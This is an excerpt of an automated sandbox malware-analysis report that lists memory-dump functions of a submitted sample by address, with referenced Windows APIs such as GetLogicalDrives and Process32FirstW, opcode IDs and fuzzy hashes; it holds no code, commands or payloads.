                                                        Function 07080CB7 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 227COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 07080D5E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\
                                                        • API String ID: 999431828-3379428675
                                                        • Opcode ID: 48099ac0784956770d03a5bdc81dd62261ad91b15a57328491bc2edaf714ca37
                                                        • Instruction ID: f6470b61cb345ad3e8e69cd6056c7061f6c62585497689586f4ffb14a201c08c
                                                        • Opcode Fuzzy Hash: 48099ac0784956770d03a5bdc81dd62261ad91b15a57328491bc2edaf714ca37
                                                        • Instruction Fuzzy Hash: 0141E6EB12C214BDB292A5856B54BFF6B6EE6C7730F30C527F4A7C6602E2D84A4D5031
                                                        Function 07080CC9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 220COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\
                                                        • API String ID: 999431828-3379428675
                                                        • Opcode ID: 6e31fe37096b49138dc00099a27ef20684e37b0e6912980b315b80df286edbac
                                                        • Instruction ID: 306a6305581ca64082575bc6a8a812e4e261c3d6c2e1b648488376a0c7218dd7
                                                        • Opcode Fuzzy Hash: 6e31fe37096b49138dc00099a27ef20684e37b0e6912980b315b80df286edbac
                                                        • Instruction Fuzzy Hash: 9141E5EB11C214BDB292A1856B54BFF676DE6C3730B30C537F4A7C2602E2D88A4D4031
                                                        Function 07080D08 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 189COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\
                                                        • API String ID: 999431828-3379428675
                                                        • Opcode ID: f2cde781457977ff9b9e3adeec886ddc561316b119ad14a4e3c7beba65661c90
                                                        • Instruction ID: df914aaeadb7e116dfd9ab14e9d8e14e8d50fd181763da2a6d2fe301c23f06c6
                                                        • Opcode Fuzzy Hash: f2cde781457977ff9b9e3adeec886ddc561316b119ad14a4e3c7beba65661c90
                                                        • Instruction Fuzzy Hash: 084104EB12C215ADB292A5856B547FF6B6DE6C7730F308627F4A7C2602E2D88A4D4031
                                                        Function 07080D14 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 185COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\
                                                        • API String ID: 999431828-3379428675
                                                        • Opcode ID: b6f75d2261191bf913ce03a29046b15a5a79acc4b1abfd3d0d527e7b92e85187
                                                        • Instruction ID: 6b9e7d980de675e19e5255c780ec85139dc2e8e5d47e3278d5591b43ee6bfd01
                                                        • Opcode Fuzzy Hash: b6f75d2261191bf913ce03a29046b15a5a79acc4b1abfd3d0d527e7b92e85187
                                                        • Instruction Fuzzy Hash: 584117EB12C214ADA292A5855B947FF6A6DE6C7730F30C627F4A7C2202E2D88A4D4031
                                                        Function 07080D28 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 182COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\
                                                        • API String ID: 999431828-3379428675
                                                        • Opcode ID: 973184b5d7c559e36d3d1a5b37e1e684c18cf7684f65973e32721863940838f4
                                                        • Instruction ID: dba50d6be31575c1ed69807d9075346e29731ae735935623a5db11575295729d
                                                        • Opcode Fuzzy Hash: 973184b5d7c559e36d3d1a5b37e1e684c18cf7684f65973e32721863940838f4
                                                        • Instruction Fuzzy Hash: 193127EB12C214ADA292A5855B547FF6B6DEBC7730F30C637F4A7C2202E2D48A4D4031
                                                        Function 07080D43 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 172COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 07080D5E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\
                                                        • API String ID: 999431828-3379428675
                                                        • Opcode ID: 7bb025c2dfd3e8245268fdc1834e259fa290c20b049e4f62cc8bbd76c9748d0f
                                                        • Instruction ID: ff50738911363e3ac6bce74f0cfe70553597a1f44d38c7fdbb6bff715894aed1
                                                        • Opcode Fuzzy Hash: 7bb025c2dfd3e8245268fdc1834e259fa290c20b049e4f62cc8bbd76c9748d0f
                                                        • Instruction Fuzzy Hash: 713107EB12C215BDA292A5855B54BFF6A6DE6C7330F30C537F4A7C2602E2C48A4D4130
                                                        Function 07080D52 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 170COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 07080D5E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\
                                                        • API String ID: 999431828-3379428675
                                                        • Opcode ID: f24f60997766e9486f3815b26223b6d493b4173348e38735444a2dbe3bc94601
                                                        • Instruction ID: e351e013e140858e33c8c801124f1bd5d05f2389ad157ce4a7e0a6385106f270
                                                        • Opcode Fuzzy Hash: f24f60997766e9486f3815b26223b6d493b4173348e38735444a2dbe3bc94601
                                                        • Instruction Fuzzy Hash: AF3118EB12C215BD7292A5895B907FF6A6DE6C7730F30C577F497D2602E2C48A4D4131
                                                        Function 070D0000 Relevance: 2.0, APIs: 1, Instructions: 475COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b7ad5e483842420ab5a13f92d871167882baa1dbefce4bbab05d3b3e79933e4d
                                                        • Instruction ID: 7359a9affe51eb57509e3ccf2edb394fe0ab81708324d69e21f68941e20ef432
                                                        • Opcode Fuzzy Hash: b7ad5e483842420ab5a13f92d871167882baa1dbefce4bbab05d3b3e79933e4d
                                                        • Instruction Fuzzy Hash: FE91C7EB16D321BDB14280456F54AFF5A6EE6D7730F308726F82FC6642E2D84E891075
                                                        Function 070D000C Relevance: 2.0, APIs: 1, Instructions: 471COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2d3a447842e7afd20ef2423d5569d8df11746ac7f1cdbf6e94dcf8c43d91990d
                                                        • Instruction ID: 4f8280ca949d70816afd2dd50a643df7cda614329b87e1a59a5d58f5ce2f3ade
                                                        • Opcode Fuzzy Hash: 2d3a447842e7afd20ef2423d5569d8df11746ac7f1cdbf6e94dcf8c43d91990d
                                                        • Instruction Fuzzy Hash: 8691C8EB16D321BDB14280456F54AFF5A6EE6D7730F308726F82FC6642E2D84E891075
                                                        Function 070D001C Relevance: 2.0, APIs: 1, Instructions: 469COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d933dd876db5efc8669c2f4740af22464ce63d36b99d586c0416047a8a6ae3e3
                                                        • Instruction ID: 124b2a67057ff0d099052acb6fc90695a290368d1f72c82d3d97c04cf7b297cd
                                                        • Opcode Fuzzy Hash: d933dd876db5efc8669c2f4740af22464ce63d36b99d586c0416047a8a6ae3e3
                                                        • Instruction Fuzzy Hash: 7F91D6EB16D321BDB14284456F14AFF6A6EE6D7730F308726F82FC6642E2D84E891075
                                                        Function 070D002D Relevance: 2.0, APIs: 1, Instructions: 468COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8ff204a676fa2943c0780de8de493e4c8a317e8ef99d691a2488fa70aacf9261
                                                        • Instruction ID: 7a8279dd4b6a0ce50b7bf03b66bd0f307ba71bb2bcc7c4ec176b4fff21fd0ff5
                                                        • Opcode Fuzzy Hash: 8ff204a676fa2943c0780de8de493e4c8a317e8ef99d691a2488fa70aacf9261
                                                        • Instruction Fuzzy Hash: D791E8EB16D321BDB14280456F14AFF6A6EE6D7730F30872AF82FC6642E2D44E891075
                                                        Function 070D00A7 Relevance: 2.0, APIs: 1, Instructions: 468COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7015680614c2de70785e4ee60d5a0969ee702ed28a4d576ae3f272b6dae06ad5
                                                        • Instruction ID: eeabb3c0d5a6c18ac52c54b658fdf0c05d4b083adefaea3494e63b24b3f3f15f
                                                        • Opcode Fuzzy Hash: 7015680614c2de70785e4ee60d5a0969ee702ed28a4d576ae3f272b6dae06ad5
                                                        • Instruction Fuzzy Hash: 1E91F7EB16D321BD714280456B54AFF6A6EE6D7730F30872AF82FC6642F2D44E891071
                                                        Function 070D0042 Relevance: 2.0, APIs: 1, Instructions: 465COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5d45188568071400c4b52819aa3933ff2b35636497e3044d5b715c855f5895f8
                                                        • Instruction ID: fd4a6e90e2a04b191ed6c546e43a224863094c8b8488556988562006abdaef5f
                                                        • Opcode Fuzzy Hash: 5d45188568071400c4b52819aa3933ff2b35636497e3044d5b715c855f5895f8
                                                        • Instruction Fuzzy Hash: F991D6EB16D321BDB14280456F14AFF6A6EE6D7730F308726F82FC6642E2D84E891071
                                                        Function 070D004E Relevance: 2.0, APIs: 1, Instructions: 462COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f76ccb4feeab319d9c55c50e493a8ba7c0c1f189f930cf95d9e318709288fef3
                                                        • Instruction ID: 7278132c82d7eb8345ca3aea21c86aa9a9d6bec8c03705a7cdb6ba67a636c45e
                                                        • Opcode Fuzzy Hash: f76ccb4feeab319d9c55c50e493a8ba7c0c1f189f930cf95d9e318709288fef3
                                                        • Instruction Fuzzy Hash: 1F91E7EB16D321BD714280856B14AFF6A6EE6D7730F308726F82FD6642F2D84E891071
                                                        Function 070D0068 Relevance: 2.0, APIs: 1, Instructions: 461COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: adda2a927b80481603e37cadd702a42f0d90dafce2cead570b0dcda9e8fc5e5d
                                                        • Instruction ID: 335e36e9703a5af4f00c51f8603db7092b41f2ba7b34c1642655b5644f0a5c55
                                                        • Opcode Fuzzy Hash: adda2a927b80481603e37cadd702a42f0d90dafce2cead570b0dcda9e8fc5e5d
                                                        • Instruction Fuzzy Hash: D791D6EB16D321BDB14280456B54AFF6B6EE6D7730F30862AF82FC6642E2D84E491071
                                                        Function 070D0085 Relevance: 2.0, APIs: 1, Instructions: 452COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 20b2712dd09070653f35abd2254603a01cbbdd2f46eff5ee8b73e9a34449ccc0
                                                        • Instruction ID: ec928b9b94b66204294259b9c5ac0e92a9fe9b7bd405a3c89c8547c7f4f189cb
                                                        • Opcode Fuzzy Hash: 20b2712dd09070653f35abd2254603a01cbbdd2f46eff5ee8b73e9a34449ccc0
                                                        • Instruction Fuzzy Hash: 8791D6EB16D321BDB14280856B54AFF5A6EE6D7730F308726F82FC6642E2D44E891075
                                                        Function 070D00BD Relevance: 1.9, APIs: 1, Instructions: 445COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2d9e0fa08e643ca03b1cf4b74b4f09d0e6e95ebf6febcb907e2d8bd16468b6dc
                                                        • Instruction ID: ecee2da689435f646a5ae691709e1711eefbd000c4cc7c43fa433aaf9860d0bd
                                                        • Opcode Fuzzy Hash: 2d9e0fa08e643ca03b1cf4b74b4f09d0e6e95ebf6febcb907e2d8bd16468b6dc
                                                        • Instruction Fuzzy Hash: 5891E4EB16D321BDB14280856F54AFF6A6EE6D7730F308726F82FC6642E2D44E891075
                                                        Function 070D010E Relevance: 1.9, APIs: 1, Instructions: 419COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 37dad4b44ae93fe129c250d943bb71f392794956beb02b92f1aa5beccf28661a
                                                        • Instruction ID: 3c645f6e44dd80ce337321eac87e27ce2f75d5311b5574c487cd4045fdba7b6b
                                                        • Opcode Fuzzy Hash: 37dad4b44ae93fe129c250d943bb71f392794956beb02b92f1aa5beccf28661a
                                                        • Instruction Fuzzy Hash: B081F7EB16D321BDB14280455B14AFF5A2EE6D7730F30872AF82FC6642E2D44F891075
                                                        Function 070D00FF Relevance: 1.9, APIs: 1, Instructions: 413COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a3632a6d5807f8c984658e2a8286a5017dc5d0112f89a479311d5e68c37983ca
                                                        • Instruction ID: d5bcd64376251e4d8783a990378c69fc2c4f97a34f954797e6c9c7e253ba3e10
                                                        • Opcode Fuzzy Hash: a3632a6d5807f8c984658e2a8286a5017dc5d0112f89a479311d5e68c37983ca
                                                        • Instruction Fuzzy Hash: 828106EB16D321BDB14280816B14AFF5A2EE6D7730F30872AF82FC6642E2D44F891075
                                                        Function 070D01DC Relevance: 1.9, APIs: 1, Instructions: 406COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cd60753950ed9c18a390fb3de6c42b8307a8e78f652ac131685c9b9edee2b80b
                                                        • Instruction ID: 245511e127e4afecdf336411755514b4c23c45907a3d096f9c123244e0237738
                                                        • Opcode Fuzzy Hash: cd60753950ed9c18a390fb3de6c42b8307a8e78f652ac131685c9b9edee2b80b
                                                        • Instruction Fuzzy Hash: B88116EB16D321BD714280856B14AFF5A6EE6D7730F30872AF82FC6642E2D44F891071
                                                        Function 070D01B2 Relevance: 1.9, APIs: 1, Instructions: 404COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 788a1258046a91aa1287fc2e3193e28e2ef1ce79cdaa99d894456600c54134ee
                                                        • Instruction ID: a876092a193bd80e3c0978eadccdb38a7a61b71c619027a064ac3c2969865f29
                                                        • Opcode Fuzzy Hash: 788a1258046a91aa1287fc2e3193e28e2ef1ce79cdaa99d894456600c54134ee
                                                        • Instruction Fuzzy Hash: DB81F8EB16D321BDB14280816B14AFF5A1EE6D7730F30872AF82FC6642E2D44F891075
                                                        Function 070D0141 Relevance: 1.9, APIs: 1, Instructions: 403COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 07d4182116bb435bdb093aaaddecef88cb18b44443b591e0fcc20d844f2f6e4c
                                                        • Instruction ID: 6e0109b0f70c04dfad15a1cde9d9b6dead3b9a7209666ff4149c6c69b0d6c2a3
                                                        • Opcode Fuzzy Hash: 07d4182116bb435bdb093aaaddecef88cb18b44443b591e0fcc20d844f2f6e4c
                                                        • Instruction Fuzzy Hash: 2981D4EB16D321BDB14280856B54AFF5A6EE6D7730F30872AF82FC6642E2D44E891075
                                                        Function 070D0161 Relevance: 1.9, APIs: 1, Instructions: 401COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3bcbb3f5ffc2bf65dcd9d748c98a3b31fe9acf321c3b6a4f1abc3350fdacf207
                                                        • Instruction ID: 33da1d69ece2fa9db119443049d997507d48d64cdfcfe2e7f1f669256efb21be
                                                        • Opcode Fuzzy Hash: 3bcbb3f5ffc2bf65dcd9d748c98a3b31fe9acf321c3b6a4f1abc3350fdacf207
                                                        • Instruction Fuzzy Hash: 5F81D6EB16D321BDB14284816B54AFF5A2EE6D7730F30872AF82FD6642E2D44E891075
                                                        Function 070D014D Relevance: 1.9, APIs: 1, Instructions: 400COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d3602162dc5c01636cffee7e1b6553ba152718f8bbeb301a45f1eff323834439
                                                        • Instruction ID: 34abd0b0323ead56007d584b444570bd207da9f0a5007865a4c3fd2be352c414
                                                        • Opcode Fuzzy Hash: d3602162dc5c01636cffee7e1b6553ba152718f8bbeb301a45f1eff323834439
                                                        • Instruction Fuzzy Hash: 4F81D5EB16D321BDB14284856B54AFF5A2EE6D7730F30872AF82FC6642E2D44F891075
                                                        Function 070D0177 Relevance: 1.9, APIs: 1, Instructions: 400COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ff54f6365e38e4b150128c986923fa70197881f4022f356b7319e804ced71b97
                                                        • Instruction ID: b17c70cc2640c3e0cfb535eb1af9b0b10ae322246b6456c679f9c5e574a02865
                                                        • Opcode Fuzzy Hash: ff54f6365e38e4b150128c986923fa70197881f4022f356b7319e804ced71b97
                                                        • Instruction Fuzzy Hash: E081F5EB16D321BD714290856B14AFF5A2EE6D7730F30872AF82FD6642E2D44F891075
                                                        Function 070D0195 Relevance: 1.9, APIs: 1, Instructions: 395COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a7aa9fdcd0f2b1a368d42a489398cfa0d935b859dca5174e0c32c5a7beffd34f
                                                        • Instruction ID: 2ab05d0a83ef49979915a1ff85a00dda77faff3ea6d7e8cf8aa479581685a91e
                                                        • Opcode Fuzzy Hash: a7aa9fdcd0f2b1a368d42a489398cfa0d935b859dca5174e0c32c5a7beffd34f
                                                        • Instruction Fuzzy Hash: 2081E6EB56D321BDB14280816B14AFF5B6EE6D7730F30872AF82FC6642E2D44E891075
                                                        Function 070D01F4 Relevance: 1.9, APIs: 1, Instructions: 374COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2ed0a5ae00fab5925c567b8413eaa268ce24195609463b80e37ee0f2bf389200
                                                        • Instruction ID: e32987cdacc8a8b0c1191727addf6b949b84dae9038da21aa23aaa5010c915a4
                                                        • Opcode Fuzzy Hash: 2ed0a5ae00fab5925c567b8413eaa268ce24195609463b80e37ee0f2bf389200
                                                        • Instruction Fuzzy Hash: DC71C3EB16D321BD714290856B14EFF5A6EE6D7730F30872AF82FC6642E2D44E891075
                                                        Function 070D0246 Relevance: 1.9, APIs: 1, Instructions: 363COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 955237b397b78588091d47acf9e38a33838b2f18558543aa756ba14b18146240
                                                        • Instruction ID: 9332443c8ea2b99604d01afab6ebbe6a589422009a72c8bf8308e51639428715
                                                        • Opcode Fuzzy Hash: 955237b397b78588091d47acf9e38a33838b2f18558543aa756ba14b18146240
                                                        • Instruction Fuzzy Hash: 4D71C4EB16D321BDB24290856F14AFF576EE6D7730F30862AF82FC6546E2D44E891071
                                                        Function 070D0227 Relevance: 1.9, APIs: 1, Instructions: 357COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Process32FirstW.KERNEL32(000000FF,000000FF,3EF02617,?), ref: 070D04C2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: FirstProcess32
                                                        • String ID:
                                                        • API String ID: 2623510744-0
                                                        • Opcode ID: f8edc67fb42eaed911f52867137f3149a04b64160d85dde2be5349de0dcf7e3a
                                                        • Instruction ID: ba2b76cef783bf7c8e3372ce1cb4f3317b4697b80f93a4cc89b480b2ec044806
                                                        • Opcode Fuzzy Hash: f8edc67fb42eaed911f52867137f3149a04b64160d85dde2be5349de0dcf7e3a
                                                        • Instruction Fuzzy Hash: 9861B2EB16D321BD714280816F14AFF5A6EE6D7730F30862AF82FC6546E2D44E891031
                                                        Function 070D0270 Relevance: 1.8, APIs: 1, Instructions: 342COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Process32FirstW.KERNEL32(000000FF,000000FF,3EF02617,?), ref: 070D04C2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: FirstProcess32
                                                        • String ID:
                                                        • API String ID: 2623510744-0
                                                        • Opcode ID: 5b79a996ea2d0eb582942ada1bcb7b0bc14b20905d683affad9c9c2275577a1b
                                                        • Instruction ID: d76760101d786416f9cc993c94b6e25ee47ec43acbf4c701be8525d76f47a8a4
                                                        • Opcode Fuzzy Hash: 5b79a996ea2d0eb582942ada1bcb7b0bc14b20905d683affad9c9c2275577a1b
                                                        • Instruction Fuzzy Hash: D461A1EB26D321BD714280856F14AFF5A6EE6D7730F30862AF82FD6646E3D40E891075
                                                        Function 070D02F1 Relevance: 1.8, APIs: 1, Instructions: 340COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
